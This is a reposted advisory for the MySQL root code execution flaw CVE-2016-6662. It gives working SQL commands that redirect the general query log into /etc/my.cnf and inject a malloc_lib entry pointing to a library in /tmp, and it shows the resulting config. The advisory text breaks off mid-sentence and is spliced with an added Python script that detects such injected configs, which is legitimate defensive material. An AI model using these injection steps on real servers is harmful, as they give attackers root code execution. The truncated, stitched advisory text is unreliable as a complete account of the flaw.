MySQL Remote Root Code Execution 0day Exploit (CVE-2016-6662)

=============================================
– Discovered by: Dawid Golunski
– http://legalhackers.com
– dawid (at) legalhackers.com

– CVE-2016-6662
– Release date: 12.09.2016
– Severity: Critical
=============================================

I. VULNERABILITY
-------------

mysql> set global general_log_file = '/etc/my.cnf';
mysql> set global general_log = on;
mysql> select '
    '>
    '> ; injected config entry
    '>
    '> [mysqld]
    '> malloc_lib=/tmp/mysql_exploit_lib.so
    '>
    '> [separator]
    '>
    '> ';
1 row in set (0.00 sec)
mysql> set global general_log = off;

The resulting config would then have the following part appended:

root@debian:~/# cat /etc/my.cnf

[mysqld]

key_buffer = 16M
max_allowed_packet = 16M

/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock
Time Id Command Argument
160728 17:25:14 40 Query select '

; injected config entry

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so

[separator]


160728 17:25:15 40 Query set global general_log = off

This config contains some redundant information that would normally cause MySQL
to fail to start up during a restart due to parsing issues.

However, the important part is that the config now contains the section:

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so

mysqld_safe will read the shared library path correctly and add it to
the LD_PRELOAD environment variable before
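A defender-side check for the artifacts this injection leaves behind, added here as an example and not part of the original advisory: a small Python audit that parses a my.cnf and flags general-query-log residue (the "started with:" banner, the "Time Id Command Argument" header and timestamped Query rows), a repeated [mysqld] section, and a malloc_lib value pointing outside the normal library directories. The sample config is constructed to mirror the appended output shown above, and TRUSTED_LIB_DIRS is an assumed allowlist, not a value from the advisory.

```python
import re
from typing import List, Tuple

# Constructed sample (not taken from a real host): a my.cnf whose tail was
# overwritten by the general query log, mirroring the advisory's output.
SAMPLE_MY_CNF = """\
[mysqld]
key_buffer = 16M
max_allowed_packet = 16M

/usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with:
Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock
Time Id Command Argument
160728 17:25:14 40 Query select '

; injected config entry

[mysqld]
malloc_lib=/tmp/mysql_exploit_lib.so

[separator]

160728 17:25:15 40 Query set global general_log = off
"""

# Constructed clean config for comparison.
CLEAN_MY_CNF = """\
[mysqld]
key_buffer = 16M
max_allowed_packet = 16M
"""

# Lines that only the general query log emits; none belongs in a hand-written
# config file, so any hit means the file was (at least partly) written by mysqld.
LOG_RESIDUE_PATTERNS = (
    re.compile(r"started with:\s*$"),                            # mysqld log banner
    re.compile(r"^Time\s+Id\s+Command\s+Argument\s*$"),          # log column header
    re.compile(r"^\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+\d+\s+Query\b"),  # timestamped query row
)

# Assumed allowlist of directories a legitimate malloc_lib should live in.
TRUSTED_LIB_DIRS = ("/usr/lib/", "/usr/lib64/", "/lib/", "/lib64/", "/usr/local/lib/")


def audit_my_cnf(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, finding) pairs for suspicious content in a my.cnf."""
    findings: List[Tuple[int, str]] = []
    seen_sections = set()
    section = None
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # blank or comment (the injected "; injected config entry" lands here)

        # 1. General-log residue: checked before key=value parsing so a logged
        #    "set global general_log = off" is not mistaken for a setting.
        if any(p.search(line) for p in LOG_RESIDUE_PATTERNS):
            findings.append((lineno, f"general-log residue inside config: {line}"))
            continue

        # 2. Section headers: a repeated [mysqld] is how the injected block
        #    re-opens the server section after the log preamble.
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            if section in seen_sections:
                findings.append((lineno, f"duplicate section [{section}]"))
            seen_sections.add(section)
            continue

        # 3. malloc_lib pointing outside the trusted library directories.
        key, sep, value = line.partition("=")
        if not sep:
            continue
        key = key.strip().lower().replace("-", "_")
        value = value.strip().strip("'\"")
        if key == "malloc_lib" and "/" in value and not value.startswith(TRUSTED_LIB_DIRS):
            # A bare name such as "tcmalloc" carries no path and is left alone here.
            findings.append((lineno, f"malloc_lib outside trusted dirs in [{section}]: {value}"))
    return findings


if __name__ == "__main__":
    for lineno, finding in audit_my_cnf(SAMPLE_MY_CNF):
        print(f"line {lineno}: {finding}")
```

Run against the constructed sample, the audit reports the log banner, the column header, both timestamped Query rows, the second [mysqld] header and the /tmp malloc_lib entry, while the clean config produces no findings. Residue lines are matched before key=value parsing on purpose: the logged "set global general_log = off" contains an equals sign and would otherwise be read as a setting.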


Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/0z1_aQhvi9E/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html
